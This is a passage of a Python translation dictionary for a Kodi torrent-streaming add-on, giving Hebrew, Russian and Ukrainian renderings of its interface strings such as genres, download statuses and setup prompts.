'הקובץ נכשל האם לנסות שנית?', 'High Priority Files': 'קבצים בחשיבות עליונה', 'Skip All Files': 'דלג על כל הקבצים', 'Start': 'התחל', 'Stop': 'עצור', 'Play':'נגן', 'High Priority': 'חשיבות גבוהה', 'Skip File': 'דלג על הקובץ', 'Remove': 'הסר', 'Remove with files': 'הסר קבצים', 'Play File': 'נגן קובץ', 'Start All Files': 'התחל את כל הקבצים', 'Stop All Files': 'הפסק את כל הקבצים', 'Torrent-client Browser': 'דפדפן טורנט', 'Remote Torrent-client': 'טורנט מרוחק', 'You didn\'t set up replacement path in setting.': 'נא למלא נתיב לשמירה בהגדרות', 'For example /media/dl_torr/ to smb://SERVER/dl_torr/. Setup now?': 'For example /media/dl_torr/ to smb://SERVER/dl_torr/. Setup now?', 'Manual Torrent-client Path Edit': 'Manual Torrent-client Path Edit', 'Choose .torrent in video library': 'בחר בטורנט מהספריה', '.torrent Player': 'נגן טורנט', 'Choose directory:': 'בחר מיקום:', 'Starting download next episode!': 'מתחיל להורד בפרק הבא', 'Choose in torrent-client:': 'בחר לקוח טורנט', 'Search Control Window': 'הגדרת טראקרים', 'Magnet-link (magnet:...)': ' (magnet:...)קישור מגנט', 'Not a magnet-link!': 'לא קישור מגנט', 'Magnet-link Player': 'נגן קישור מגנט', 'UNKNOWN STATUS': 'סטטוס לא ידוע', 'Checking preloaded files...': 'בודק קבצים', 'Waiting for website response...': 'ממתין לתשובת האתר ', 'Search and cache information for:': 'תקצירי הסרטים יורדים', 'Open Torrent': 'פתח טורנט', 'Torrent list is empty.': 'רשימה ריקה', 'Content Lists': 'רשימות תוכן ההרחבה', 'Canceled by User': 'בוטל', 'Do you want to search and cache full metadata + arts?': 'האם תרצה להוריד מידע על הסרטים', 'This vastly decreases load speed, but you will be asked to download premade bases!': 'זה יאט את קצב ההעלאה אך יוריד מידע על הסרטים', 'Do you want to preload full metadata?': 'האם תרצה להוריד את כל המידע', 'It is highly recommended!': 'מומלץ', 'TV Shows': 'סדרות', 'Cartoons': 'אנימציה', 'Anime': 'אנימה', 'Most Recent': 'החדשים ביותר', 'Top 250 Movies': '250 הטובים ביותר', 'Top All Time': 'הטובים בכל הזמנים', 'by Genre': 'לפי קטגוריה', 'by Year': 'לפי שנה', 'Action': 'פעולה', 'Adventure': 'הרפתקאות', 'Animation': 'אנימציה', 'Biography': 'ביוגרפי', 'Comedy': 'קומדיה', 'Crime': 'פשע', 'Documentary': 'דוקומנטרי', 'Drama': 'דרמה', 'Family': 'משפחתי', 'Fantasy': 'פנטסיה', 'Film-Noir': 'פילם נואר', 'History': 'היסטורי', 'Horror': 'אימה', 'Music': 'מוזיקה', 'Musical': 'מחזמר', 'Mystery': 'מסתורי', 'Romance': 'רומנטי', 'Sci-Fi': 'מדע בדיוני', 'Short': 'קצר', 'Sport': 'ספורט', 'Thriller': 'מותחן', 'War': 'מלחמתי', 'Western': 'מערבון', '[B]by Site[/B]': '[B]על פי אתר[/B]', 'Cartoons Series': 'סדרה מצוירת', 'Cartoons Short': 'מצוירים -קצר', 'Male': 'גבר', 'Female': 'אשה', 'Russia & USSR': 'רוסיה', 'Next Page': 'הדף הבא', 'Previous Page': 'הדף הקודם', 'Russian Movies': 'סרטים רוסיים', 'israeli Movies': 'סרטים ישראלים', 'hebdub movies': 'סרטים מדובבים', 'Movies': 'סרטים', 'High Resolution Movies': 'סרטים באיכות גבוהה', '3D Movies': '3D סרטי', 'Movies [Bluray]': ' [Bluray] סרטים ', 'Anime Film': 'סרטי אנימה', 'Anime Series': 'סדרות אנימה', 'Can\'t download torrent, probably no seeds available.': 'לא ניתן להוריד את הטורנט אין מספיק זורעים', 'Personal List': 'רשימה אישית', 'Add to %s': '%s הוסף ל ', 'Delete from %s': 'מחק מ %s', 'Added!': 'נוסף!', 'Deleted!': 'נמחק', 'Search History': 'הסטורית חיפוש', ' History ':' הסטוריה ', 'Torrent History':'הסטורית טורנט', 'Watched History':'הסטורית צפיה', 'Favourites': 'מועדפים', 'Favourites SH': 'מועדפי הסטורית חיפוש', 'Clear %s': 'נקה %s', 'Clear!': 'נקה', 'kb/s': 'kb/s', 'Queued': 'בתור', 'Checking': 'בודק', 'Downloading metadata': 'מוריד מידע', 'Downloading': 'מוריד', 'Finished': 'סיים', 'Seeding': 'זורע', 'Allocating': 'מאתר', 'Allocating file & Checking resume': 'מאתר קובץ ובודק', 'For Kids': 'לילדים', 'Adult': 'מבוגרים', 'Does not support magnet links!': 'לא תומך בקובץ מגנט!', 'Reset All Cache DBs': 'רענן מחדש', '[B]Search[/B]': '[B]חפש[/B]', 'You can always restart this by deleting DBs via Context Menu': 'You can always restart this by deleting DBs via Context Menu', 'Your preloaded databases are outdated!': 'Your preloaded databases are outdated!', 'Do you want to download new ones right now?': 'Do you want to download new ones right now?', 'Individual Tracker Options':'Individual Tracker Options', 'Downloading and copy subtitles. Please wait.':'Downloading and copy subtitles. Please wait.', 'International Check - First Run':'בדיקה אינטרנשיונאלית ', 'Delete Russian stuff?':'למחוק תוכן רוסי?', 'Save to path':'שמור בנתיב', 'Return Russian stuff':'להחזיר תוכן רוסי', '%d files have been returned':'הקובץ הוחזר', 'Download via T-client':'הורד דרך לקוח טי', 'Download via Libtorrent':'הורד דרך ליבטורנט', 'Download Status':'מצב הורדה', 'Download has not finished yet':'ההורדה לא הסתיימה', 'Stopped and Deleted!':'נעצר ונמחק', 'Unpaused!':'לא נעצר', 'Paused!':'נעצר', 'Stopped!':'הופסק', 'Started!':'התחיל', 'Delete and Stop':'מחק ועצור', 'Unpause':'אל תפסיק', 'Pause':'הפסק', 'Delete':'מחק', 'Open (no return)':'פתח', 'Torrent is seeding. To stop it use Download Status.':'Torrent is seeding. To stop it use Download Status.', 'Start All':'התחל הכל', 'Started All!':'מיין הכל', 'Stopped All!':'עצר', 'Stop All':'עצור הכל', 'Keyboard':'מקלדת', 'Copy Files in Root':'Copy Files in Root', 'Copied %d files!':'Copied %d files!', 'Add to MyShows.ru':'Add to MyShows.ru', 'Return to MyShows.ru':'Return to MyShows.ru', 'Search results:':'תוצאות חיפוש', 'by Seeders':'לפי כמות זורעים', 'by Date':'לפי זמן', 'Sort':'סדר', 'Close':'סגור', 'Views:':'צפיות:', 'Rating:':'דירוג:', 'Information not found!':'המידע לא נמצא', 'Choose searcher':'בחר טראקר', 'python-libtorrent Not Found':'לא נמצא', 'Windows has static compiled python-libtorrent included.':'לליבטורנט יש קובץ התקנה עבור ווינדוס', 'You should install "script.module.libtorrent" from "MyShows.me Kodi Repo"':'נא להתקין את הקובץ script.module.libtorrent. מתוך הריפו', 'Linux x64 has not static compiled python-libtorrent included.':'Linux x64 has not static compiled python-libtorrent included.', 'You should install it by "sudo apt-get install python-libtorrent"':'You should install it by "sudo apt-get install python-libtorrent"', 'Linux has static compiled python-libtorrent included but it didn\'t work.':'На Linux x86 есть статическая python-libtorrent, но она очевидно не сработала.', 'As far as I know you can compile python-libtorrent for ARMv6-7.':'As far as I know you can compile python-libtorrent for ARMv6-7.', 'You should search for "OneEvil\'s OpenELEC libtorrent" or use Ace Stream.':'Поищи "OneEvil\'s OpenELEC libtorrent" или используй Ace Stream', 'Please use install Ace Stream APK and choose it in Settings.':'Установите Ace Stream APK и выберите плеер в Найстройка плагина', 'It is possible to compile python-libtorrent for Android, but I don\'t know how.':'Вообще скомпилировать python-libtorrent на Android можно, но мы не знаем как.', 'It is possible to compile python-libtorrent for OS X.':'Вообще скомпилировать python-libtorrent на OS X можно.', 'But you would have to do it by yourself, there is some info on github.com.':'But you would have to do it by yourself, there is some info on github.com.', 'It is NOT possible to compile python-libtorrent for iOS.':'It is NOT possible to compile python-libtorrent for iOS', 'But you can use torrent-client control functions.':'But you can use torrent-client control functions.', 'I added custom searchers to Torrenter v2!':'I added custom searchers to Torrenter v2!', 'Now you can use your login on trackers or write and install your own searcher!':'Now you can use your login on trackers or write and install your own searcher!', 'Would you like to install %s from "MyShows.me Kodi Repo" in Programs section?':'Would you like to install %s from "MyShows.me Kodi Repo" in Programs section?', 'Open installation window?':'לפתוח את חלון ההתקנה?', 'Android Support':'תמיכה באנדרואיד', 'Android has no temprorary folder':'', 'Please specify storage folder in Settings!':'בחר תיקיה לשמירת הקבצים בהגדרות', 'You have no installed or active searchers! More info in Search Control Window!':'לא קיימים טראקרים פעילים נא להוסיף דרך "הגדרות טראקרים"', 'Please contact DiMartino on kodi.tv forum. We compiled python-libtorrent for Android,':'Please contact DiMartino on kodi.tv forum. We compiled python-libtorrent for Android,', 'but we need your help with some Torrent is seeding. To stop it use Download Status.s on different processors.':'but we need your help with some Torrent is seeding. To stop it use Download Status.s on different processors.', 'We added Android ARM full support to Torrenter v2!':'We added Android ARM full support to Torrenter v2!', 'I deleted pre-installed ones, install them in Search Control Window!':'I deleted pre-installed ones, install them in Search Control Window!', 'Torrenter didn\'t find %s searcher':'טראקר לא נמצא', 'Torrenter Tracker Install':'טראקר הותקן', 'Ask to save':'בקש לשמור', 'Would you like to save this file?':'האם תרצה לשמור קובץ זה?', 'Your storage path is not writable or not local! Please change it in settings!':'שטח אחסון הקבצים לא מקומי או שלא ניתן לכתוב בו ,שנה בהגדרות', 'Upgrade advancedsettings.xml':'Upgrade advancedsettings.xml', 'We would like to set some advanced settings for you!':'We would like to set some advanced settings for you!', 'Do it!':'עשה זאת', 'Please, restart Kodi now!':'התחל מחדש את קודי', './ (Root folder)':'./ (Root folder)', 'Opening torrent file':'פותח קבצים', 'New player to Torrenter v2 - Torrent2HTTP! It should be faster, stable and better with Android, also seeking works in it.':'נגן חדש (מומלץ)', 'Would you like to try it?':'האם תרצה לנסות', 'Torrent2HTTP enabled! Can be changed in Settings.':'Torrent2HTTP הופעל', 'Seeking':'מחפש', 'Would you like to resume from %s?':'האם תרצה לחזור מ $?', 'Seeking is working only with player Torrent2HTTP.':' לא עובד עם נגן זה ', 'Play (from %s)':'%s נגן מ', 'Play (from start)':'נגן מהתחלה', }, 'ru': { 'Seeds searching.': 'Идёт поиск сидов.', 'Please Wait': 'Подождите', 'Information': 'Информация', 'Torrent downloading is stopped.': 'Загрузка торрента прекращена.', 'Search': 'Поиск', 'Seeds': 'Сиды', 'Peers': 'Пиры', 'Materials are loading now.': 'Идёт загрузка материалов.', 'Search Phrase': 'Фраза для поиска', 'Magnet-link is converting': 'Идёт преобразование magnet-ссылки', 'Error': 'Ошибка', 'Your library out of date and can\'t save magnet-links.': 'Ваша библиотека устарела и не может сохранять магнет-ссылки.', 'Bookmarks': 'Закладки', 'Logout': 'Выход', 'Login': 'Вход', 'Recent Materials': 'Свежие Материалы ', 'Register': 'Регистрация', 'Bookmark': 'Закладка', 'Item successfully added to Bookmarks': 'Элемент удачно добавлен в закладки', 'Item successfully removed from Bookmarks': 'Элемент удачно удалён из закладок', 'Bookmark not added': 'Закладка не добавлена', 'Bookmark not removed': 'Закладка не удалена', 'Add To Bookmarks': 'Добавить в закладки', 'Remove From Bookmarks': 'Удалить из Закладок', 'Auth': 'Авторизация', 'Already logged in': 'Пользователь уже в системе', 'Input Email (for password recovery):': 'Введите E-mail (для восстановления пароля):', 'Input Email:': 'Введите E-mail:', 'Input Password (6+ symbols):': 'Введите пароль (6+ символов):', 'Input Password:': 'Введите пароль:', 'Login successfull': 'Вход выполнен успешно', 'Login failed': 'Вход не выполнен', 'User not logged in': 'Пользователь не в системе', 'User successfully logged out': 'Пользователь успешно покинул систему', 'Preloaded: ': 'Предзагружено: ', 'Do you want to STOP torrent downloading and seeding?': 'Вы хотите остановить загрузку и раздачу торрента?', 'Torrent Downloading': 'Загрузка торрента', 'Auth expired, please relogin': 'Авторизация истекла, пожалуйста войдите снова', 'Storage': 'Хранилище', 'Storage has been cleared': 'Хранилище очищено', 'Clear Storage': 'Очистить хранилище', 'Popular': 'Популярное', 'Views': 'Просмотров', 'Uploading': 'Раздача', 'Download': 'Скачать', 'Input symbols from CAPTCHA image:': 'Введите символы с картинки CAPTCHA:', 'Please, rate watched video:': 'Пожалуйста, оцените просмотренное видео:', 'Bad': 'Плохо', 'So-So': 'Такое...', 'Good': 'Отлично', 'Ratings': 'Оценки', 'Rating': 'Оценка', 'Retry': 'Повторная попытка', '%ds has left': 'Осталось %d попыток', 'File failed to play! Do you want to RETRY and buffer more?': 'Ошибка проигрывания файла! Хотите предзагрузить больше и повторить?', 'High Priority Files': 'Высокий Приоритет Файлам', 'Skip All Files': 'Пропустить Все Файлы', 'Start': 'Пуск', 'Stop': 'Стоп', 'Play':'Воспроизвести', 'High Priority': 'Высокий Приоритет', 'Skip File': 'Пропустить Файл', 'Remove': 'Удалить', 'Remove with files': 'Удалить с файлами', 'Play File': 'Проиграть файл', 'Start All Files': 'Пуск Всем Файлам', 'Stop All Files': 'Стоп Всем Файлам', 'Torrent-client Browser': 'Браузер Торрент-клиента', 'Remote Torrent-client': 'Удаленный торрент-клиент', 'You didn\'t set up replacement path in setting.': 'Вы не настроили замены путей.', 'For example /media/dl_torr/ to smb://SERVER/dl_torr/. Setup now?': 'Например /media/dl_torr/ на smb://SERVER/dl_torr/. Настроить?', 'Manual Torrent-client Path Edit': 'Вручную изменить папку торрент-клиента по-умолчанию', 'Choose .torrent in video library': 'Выберите .torrent в видеобиблиотеке', '.torrent Player': '.torrent Проигрыватель', 'Choose directory:': 'Выберите папку:', 'Starting download next episode!': 'Начинаю скачку следующего эпизода!', 'Choose in torrent-client:': 'Выберите раздачу:', 'Search Control Window': 'Окно Управления Поиском', 'Magnet-link (magnet:...)': 'Magnet-ссылка (magnet:...)', 'Not a magnet-link!': 'Не является magnet-ссылкой', 'Magnet-link Player': 'Проигрыватель Magnet-Ссылок', 'UNKNOWN STATUS': 'Неизвестное состояние', 'Checking preloaded files...': 'Проверка файлов...', 'Waiting for website response...': 'Ожидание ответа сайта...', 'Search and cache information for:': 'Поиск и кэширование информации для:', 'Open Torrent': 'Открыть Список файлов', 'Torrent list is empty.': 'Список раздач пуст.', 'Content Lists': 'Списки Медиа', 'Canceled by User': 'Отменено пользователем', 'Do you want to search and cache full metadata + arts?': 'Хотите автоматически получать мета-данные и арты?', 'This vastly decreases load speed, but you will be asked to download premade bases!': 'Это существенно снижает скорость загрузки, но Вам предложат скачать готовые базы!', 'Do you want to preload full metadata?': 'Хотите готовую загрузить базу данных?', 'It is highly recommended!': 'Настоятельно рекомендовано согласиться!', 'TV Shows': 'Сериалы', 'Cartoons': 'Мультфильмы', 'Anime': 'Аниме', 'Most Recent': 'Горячие Новинки', 'Top 250 Movies': 'Лучшие 250 фильмов', 'Top All Time': 'Лучшее за ВСЕ ВРЕМЯ', 'by Genre': 'по Жанру', 'by Year': 'по Году', 'Action': 'Боевики', 'Adventure': 'Приключения', 'Animation': 'Анимация', 'Biography': 'Биография', 'Comedy': 'Комедии', 'Crime': 'Детектив', 'Documentary': 'Документальное', 'Drama': 'Драмы', 'Family': 'Семейное', 'Fantasy': 'Фэнтази', 'Film-Noir': 'Нуар', 'History': 'Историчекие', 'Horror': 'Ужасы', 'Music': 'Музыкальные', 'Musical': 'Мьюзиклы', 'Mystery': 'Мистика', 'Romance': 'Мелодрамы', 'Sci-Fi': 'Фантастика', 'Short': 'Короткометражки', 'Sport': 'Спортивные', 'Thriller': 'Триллеры', 'War': 'Военные', 'Western': 'Вестерны', '[B]by Site[/B]': '[B]по Сайту[/B]', 'Cartoons Series': 'Мультсериалы', 'Cartoons Short': 'Мультфильмы (короткометражки)', 'Male': 'Мужские', 'Female': 'Женские', 'Russia & USSR': 'Россия + СССР', 'Next Page': 'Следующая Страница', 'Previous Page': 'Предыдущая Страница', '3D Movies': 'Фильмы 3D', 'Russian Movies': 'Отечественные Фильмы', 'Movies': 'Зарубежные Фильмы', 'israeli Movies': 'израильские фильмы', 'hebdub movies': 'Фильмы на иврите', 'High Resolution Movies': 'высокое разрешение фильма', 'Movies [Bluray]': 'Фильмы [Blu-ray]', 'Anime Film': 'Полнометражное Аниме', 'Anime Series': 'Аниме Сериалы', 'Can\'t download torrent, probably no seeds available.': 'Не могу скачать торрент, скорее всего нет доступных сидов.', 'Personal List': 'Личный Список', 'Add to %s': 'Добавить в %s', 'Delete from %s': 'Удалить из %s', 'Added!': 'Добавлено', 'Deleted!': 'Удалено!', 'Search History': 'История Поиска', ' History ':' История ', 'Torrent History':'История Торрентов', 'Watched History':'История Просмотров', 'Favourites': 'Избранное', 'Favourites SH': 'Избранное ИП', 'Clear %s': 'Очистить %s', 'Clear!': 'Очищено!', 'kb/s': 'КБ/с', 'Queued': 'В очереди', 'Checking': 'Проверка', 'Downloading metadata': 'Скачивание мета-данных', 'Downloading': 'Скачивание', 'Finished': 'Окончено', 'Seeding': 'Раздача (сидирование)', 'Allocating': 'Allocating', 'Allocating file & Checking resume': 'Allocating file & Checking resume', 'For Kids': 'Детское', 'Adult': 'Эротика', 'Does not support magnet links!': 'Не поддерживает магнит-ссылки!', 'Reset All Cache DBs': 'Сбросить Базы Данных', '[B]Search[/B]': '[B]Поиск[/B]', 'You can always restart this by deleting DBs via Context Menu': 'Вы всегда можете перезапустить этот процесс через Контекстное Меню', 'Your preloaded databases are outdated!': 'Ваши предзакаченные базы метаданных устарели!', 'Do you want to download new ones right now?': 'Хотите прямо сейчас скачать новые?', 'Individual Tracker Options':'Выбор Трекеров', 'Downloading and copy subtitles. Please wait.':'Скачиваю и копирую субтитры. Пожалуйста подождите.', 'International Check - First Run':'International Check - Первый запуск', 'Delete Russian stuff?':'Удалить русские трекеры?', 'Save to path':'Сохранить в папку', 'Return Russian stuff':'Вернуть русские трекеры', '%d files have been returned':'%d файлов возвращено', 'Download via T-client':'Скачать Торр-клиентом', 'Download via Libtorrent':'Скачать Libtorrent\'ом', 'Download Status':'Статус Загрузки', 'Download has not finished yet':'Загрука не завершена', 'Stopped and Deleted!':'Загрузка остановлена и удалена!', 'Unpaused!':'Возобновлено!', 'Paused!':'Приостановлено!', 'Stopped!':'Остановлено!', 'Started!':'Начинается загрузка!', 'Delete and Stop':'Удалить и Остановить', 'Unpause':'Возобновить', 'Pause':'Пауза', 'Delete':'Удалить', 'Open (no return)':'Открыть (без возврата)', 'Torrent is seeding. To stop it use Download Status.':'Сидирование. Для остановки используйте Статус Загрузки.', 'Start All':'Запустить Все', 'Started All!':'Все Запущены!', 'Stopped All!':'Все Остановлено!', 'Stop All':'Остановить Все', 'Keyboard':'Клавиатура', 'Copy Files in Root':'Скопировать файлы в Корень', 'Copied %d files!':'Скопировано %d файлов!', 'Return to %s':'Вернуться в %s', 'Search results:':'Результаты поиска:', 'by Seeders':'по Сидам', 'by Date':'по Дате', 'Sort':'Сортировка', 'Close':'Закрыть окно', 'Views:':'Просм.:', 'Rating:':'Рейтинг:', 'Information not found!':'Информация не найдена!', 'Choose searcher':'Выберите трекер', 'python-libtorrent Not Found':'python-libtorrent не найден', 'Windows has static compiled python-libtorrent included.':'На Windows при установке из репозитория к плагину идет python-libtorrent.', 'You should install "script.module.libtorrent" from "MyShows.me Kodi Repo"':'Установите "script.module.libtorrent" из "MyShows.me Kodi Repo"', 'Linux x64 has not static compiled python-libtorrent included.':'На Linux x64 не смогли собрать статическую python-libtorrent', 'You should install it by "sudo apt-get install python-libtorrent"':'Установи коммандой "sudo apt-get install python-libtorrent"', 'Linux has static compiled python-libtorrent included but it didn\'t work.':'На Linux x86 есть статическая python-libtorrent, но она очевидно не сработала.', 'As far as I know you can compile python-libtorrent for ARMv6-7.':'На ARMv6-7 можно скомпилировать python-libtorrent', 'You should search for "OneEvil\'s OpenELEC libtorrent" or use Ace Stream.':'Поищи "OneEvil\'s OpenELEC libtorrent" или используй Ace Stream', 'Please use install Ace Stream APK and choose it in Settings.':'Установите Ace Stream APK и выберите плеер в Найстройка плагина', 'It is possible to compile python-libtorrent for Android, but I don\'t know how.':'Вообще скомпилировать python-libtorrent на Android можно, но мы не знаем как.', 'It is possible to compile python-libtorrent for OS X.':'Вообще скомпилировать python-libtorrent на OS X можно.', 'But you would have to do it by yourself, there is some info on github.com.':'Но придется это тебе делать самому, на гитхабе была инфа', 'It is NOT possible to compile python-libtorrent for iOS.':'Под iOS невозможно скомпилировать python-libtorrent', 'But you can use torrent-client control functions.':'Но все остальные функции кроме прямого стриминга с торрента работают.', 'I added custom searchers to Torrenter v2!':'Я добавил внешние серчеры для трекеров в стиле Pulsar!', 'Now you can use your login on trackers or write and install your own searcher!':'Теперь можно использовать свой логин или даже написать и установить свой серчер.', 'Would you like to install %s from "MyShows.me Kodi Repo" in Programs section?':'Хотите установить %s из "MyShows.me Kodi Repo" в Программах?', 'Open installation window?':'Открыть окно установки?', 'Android Support':'Поддержка Android', 'Android has no temprorary folder':'У Android отсутствует стандартная временная папка', 'Please specify storage folder in Settings!':'Пожалуйста, укажите папку хранилища файлов!', 'You have no installed or active searchers! More info in Search Control Window!':'У вас нет установленных или активных серчеров. Подробнее в Окне Управления Поиском.', 'Please contact DiMartino on kodi.tv forum. We compiled python-libtorrent for Android,':'Свяжитесь с DiMartino на xbmc.ru. Мы собрали python-libtorrent на Android', 'but we need your help with some tests on different processors.':'но нам нужна помощь в тестировании на разные процессоры.', 'We added Android ARM full support to Torrenter v2!':'Мы добавили полную поддержку Android ARM в Torrenter v2!', 'I deleted pre-installed ones, install them in Search Control Window!':'Теперь серчеры нужно устанавливать отдельно в Окне Управления Поиском!', 'Torrenter didn\'t find %s searcher':'Торрентер не нашел серчер трекера %s', 'Torrenter Tracker Install':'Установка трекеров в Torrenter', 'Ask to save':'Спросить о сохранении', 'Would you like to save this file?':'Хотите сохранить данный файл?', 'Your storage path is not writable or not local! Please change it in settings!':'Ваше хранилище не доступно для записи или не локально! Измените в настройках!', 'Upgrade advancedsettings.xml':'Обновление advancedsettings.xml', 'We would like to set some advanced settings for you!':'Нам нужно обновить продвинутые настройки для работы!', 'Do it!':'Скажите "ДА"!', 'Please, restart Kodi now!':'Теперь перезагрузите Коди, пожалуйста!', './ (Root folder)':'./ (Корневой каталог)', 'Opening torrent file':'Открытие torrent-файла', 'New player to Torrenter v2 - pyrrent2http! Advantages of Torrent2HTTP but with python-libtorrent library instead of libtorrent-go!':'В Torrenter новый плеер - pyrrent2http! Преимущества Torrent2HTTP, но на библиотеке python-libtorrent вместо libtorrent-go!', 'Would you like to try it?':'Хотите его попробовать?', 'Torrent2HTTP enabled! Can be changed in Settings.':'Torrent2HTTP включен! Можно изменить в Настройках.', 'Seeking':'Перемотка', 'Would you like to resume from %s?':'Хотите начать проигрывать с %s?', 'Seeking is working only with player Torrent2HTTP.':'Перемотка работает только с плеером Torrent2HTTP.',\ 'Play (from %s)':'Играть (c %s)', 'Play (from start)':'Играть (с начала)', 'Edit':'Редактировать', 'Would you like to play next episode?':'Проиграть следующий эпизод?', }, 'uk': { 'Seeds searching.': 'Йде пошук сідів.', 'Please Wait': 'Зачекайте', 'Information': 'Інформація', 'Torrent downloading is stopped.': 'Завантаження торренту зупинено.', 'Search': 'Пошук', 'Seeds': 'Сіди', 'Peers': 'Піри', 'Materials are loading now.': 'Йде завантаження матеріалів.', 'Search Phrase': 'Фраза для пошуку', 'Magnet-link is converting.': 'Йде перетворення магнет-посилання.', 'Error': 'Помилка', 'Your library out of date and can\'t save magnet-links.': 'Ваша бібліотека застаріла і не може зберігати магнет-посилання.', 'Bookmarks': 'Закладки', 'Logout': 'Вихід', 'Login': 'Вхід', 'Recent Materials': 'Свіжі матеріали', 'Register': 'Регістрація', 'Bookmark': 'Закладка', 'Item successfully added to Bookmarks': 'Элемент успішно доданий в закладки', 'Item successfully removed from Bookmarks': 'Элемент успішно вилучений из закладок', 'Bookmark not added': 'Закладка не додана', 'Bookmark not removed': 'Закладка не вилучена', 'Add To Bookmarks': 'Додати в закладки', 'Remove From Bookmarks': 'Вилучити з закладок', 'Auth': 'Авторизація', 'Already logged in': 'Користувач вже в системі', 'Input Email (for password recovery):': 'Введіть E-mail (для відновлення паролю):', 'Input Email:': 'Введіть E-mail:', 'Input Password (6+ symbols):': 'Введіть пароль (6+ символів):', 'Input Password:': 'Введіть пароль:', 'Login successfull': 'Вхід виконаний успішно', 'Login failed': 'Вхід не виконаний', 'User not logged in': 'Користувач не в системі', 'User successfully logged out': 'Користувач успішно залишив систему', 'Preloaded: ': 'Попередньо завантажено: ', 'Do you want to STOP torrent downloading and seeding?': 'Ви бажаєте зупинити завантаження і раздачу торренту?', 'Torrent Downloading': 'Завантаження торренту', 'Auth expired, please relogin': 'Авторизація сплила, будь ласка, увійдіть знову', 'Storage': 'Сховище', 'Storage has been cleared': 'Сховище очищене', 'Clear Storage': 'Очистити сховище', 'Popular': 'Популярне', 'Views': 'Перегляди', 'Uploading': 'Роздача', 'Download': 'Завантажити', 'Input symbols from CAPTCHA image:': 'Введіть символи з картинки CAPTCHA:', 'Please, rate watched video:': 'Будь ласка, оцініть переглянуте відео:', 'Bad': 'Погане', 'So-So': 'Таке собі...', 'Good': 'Добре', 'Ratings': 'Оцінки', 'Rating': 'Оцінка', 'Retry': 'Повторна спроба', '%ds has left': 'Залишилось %d сброб', 'File failed to play! Do you want to RETRY and buffer more?': 'Помилка відтворення файлу! Бажаєте спробувати знову і завантажити більше?', 'High Priority Files': 'Файли високого пріоритету', 'Skip All Files': 'Пропустити всі файли', 'Start': 'Запустити', 'Stop': 'Стоп', 'Play':'Відтворити', 'High Priority': 'Високий пріоритет', 'Skip File': 'Пропустити файл', 'Remove': 'Вилучити', 'Remove with files': 'Вилучити з файлами', 'Play File': 'Відтворити файл', 'Start All Files': 'Запустити всі файли', 'Stop All Files': 'Зупинити всі файли', 'Torrent-client Browser': 'Браузер торрент-клієнта', 'Remote Torrent-client': 'Віддалений торрент-клієнт', 'You didn\'t set up replacement path in setting.': 'Вы не налаштували заміну шляху.', 'For example /media/dl_torr/ to smb://SERVER/dl_torr/. Setup now?': 'Наприклад, /media/dl_torr/ на smb://SERVER/dl_torr/. Налаштувати?', 'Manual Torrent-client Path Edit': 'Змінити вручну каталог торрент-клієнта', 'Choose .torrent in video library': 'Виберіть .torrent у відеобібліотеці', '.torrent Player': '.torrent-програвач', 'Choose directory:': 'Виберіть каталог:', 'Starting download next episode!': 'Починається завантаження наступного епізоду!', 'Choose in torrent-client:': 'Оберіть роздачу:', 'Search Control Window': 'Вікно керування пошуком', 'Magnet-link (magnet:...)': 'Магнет-посилання (magnet:...)', 'Not a magnet-link!': 'Не є магнет-посиланням', 'Magnet-link Player': 'Програвач магнет-посилань', 'UNKNOWN STATUS': 'Невідомий стан', 'Checking preloaded files...': 'Перевірка файлів...', 'Waiting for website response...': 'Очікування відповіді сайту...', 'Search and cache information for:': 'Пошук і кешування інформації для:', 'Open Torrent': 'Відкрити список файлів', 'Torrent list is empty.': 'Список роздач порожній.', 'Content Lists': 'Списки медіа', 'Canceled by User': 'Скасовано користувачем', 'Do you want to search and cache full metadata + arts?': 'Бажаєте автоматично отримувати мета-дані та арти?', 'This vastly decreases load speed, but you will be asked to download premade bases!': 'Це суттєво знижує швидкість завантаження, але вам буде запропоновано завантажити готові бази!', 'Do you want to preload full metadata?': 'Бажаєте завантажити повні мета-дані?', 'It is highly recommended!': 'Наполегливо рекомендується погодитись!', 'TV Shows': 'Серіали', 'Cartoons': 'Мультфільми', 'Anime': 'Аніме', 'Most Recent': 'Гарячі новинки', 'Top 250 Movies': 'Найкращі 250 фільмів', 'Top All Time': 'Краще за весь час', 'by Genre': 'по Жанру', 'by Year': 'по Року', 'Action': 'Боєвики', 'Adventure': 'Пригоди', 'Animation': 'Анімація', 'Biography': 'Біографія', 'Comedy': 'Комедії', 'Crime': 'Детектив', 'Documentary': 'Документальне', 'Drama': 'Драми', 'Family': 'Сімейне', 'Fantasy': 'Фентезі', 'Film-Noir': 'Нуар', 'History': 'Історичні', 'Horror': 'Жахи', 'Music': 'Музичні', 'Musical': 'М\'юзикли', 'Mystery': 'Містика', 'Romance': 'Мелодрами', 'Sci-Fi': 'Фантастика', 'Short': 'Короткометражки', 'Sport': 'Спортивні', 'Thriller': 'Трилери', 'War': 'Військові', 'Western': 'Вестерни', '[B]by Site[/B]': '[B]по Сайту[/B]', 'Cartoons Series': 'Мультсеріали', 'Cartoons Short': 'Мультфільми (короткометражки)', 'Male': 'Чоловічі', 'Female': 'Жіночі', 'Russia & USSR': 'Росія + СРСР', 'Next Page': 'Наступна сторінка', 'Previous Page': 'Попередня сторінка', 'Russian Movies': 'Вітчизняні фільми', 'Movies': 'Іноземні фільми', '3D Movies': 'Фильмы 3D', 'israeli Movies': 'израильские фильмы', 'hebdub movies': 'Фильмы на иврите', 'High Resolution Movies': 'высокое разрешение фильма', 'Movies [Bluray]': 'Фильмы [Blu-ray]', 'Anime Film': 'Повнометражні аніме', 'Anime Series': 'Аніме-серіали', 'Can\'t download torrent, probably no seeds available.': 'Не вдаєть завантажити торрент, мабуть, немає доступних сідів.', 'Personal List': 'Особистий список', 'Add to %s': 'Додати в %s', 'Delete from %s': 'Вилучити из %s', 'Added!': 'Додано', 'Deleted!': 'Вилучено!', 'Search History': 'Історія пошуку', 'Favourites': 'Вибране', 'Favourites SH': 'Вибране SH', 'Clear %s': 'Очистити %s', 'Clear!': 'Очищено!', 'kb/s': 'Кб/с', 'Queued': 'В черзі', 'Checking': 'Перевірка', 'Downloading metadata': 'Завантаження мета-даних', 'Downloading': 'Завантаження', 'Finished': 'Завершено', 'Seeding': 'Роздача (сідування)', 'Allocating': 'Виділення', 'Allocating file & Checking resume': 'Виділення файлу і перевірка резюме', 'For Kids': 'Дитяче', 'Adult': 'Еротика', 'Does not support magnet links!': 'Не підтримує магнет-посилання!', 'Reset All Cache DBs': 'Зкинути усі закешовані бази', '[B]Search[/B]': '[B]Пошук[/B]', 'You can always restart this by deleting DBs via Context Menu': 